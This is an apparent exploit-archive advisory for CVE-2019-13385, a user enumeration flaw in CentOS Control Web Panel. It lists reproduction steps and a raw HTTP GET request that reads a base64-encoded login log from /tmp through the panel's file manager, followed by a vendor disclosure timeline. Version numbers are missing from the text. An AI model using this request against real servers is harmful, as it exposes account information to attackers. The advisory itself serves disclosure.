CentOS Control Web Panel User Enumeration

CentOS Control Web Panel (CWP) versions through suffer from a user enumeration vulnerability.

MD5 | b641e3a461a0d2b4932c082c36d4a365

# Exploit Title: CWP (CentOS Control Web Panel) User Enumeration
# Date: 23 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/
# Version: to
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13385

# Description:

An attacker who gains access as a low privilege user can check active users on the system by checking log file.
The access log is stored at /tmp directory with encoded content in base64 format.

# Steps to Reproduce

1. Login as a low privilege user
2. Browse to https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/username/fileManager2.php?frame=3&fm_current_dir=/tmp///
3. login log is login.log file in base64 format


GET /cwp_70b80498fb4cb150/user1/fileManager2.php?frame=3&fm_current_dir=/tmp/// HTTP/1.1
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en,th-TH;q=0.9,th;q=0.8

# PoC


# Timeline
2019-07-03: Discovered the bug
2019-07-03: Reported to vendor
2019-07-04: Vender accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-23: Published

# Discovered by
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

Related Posts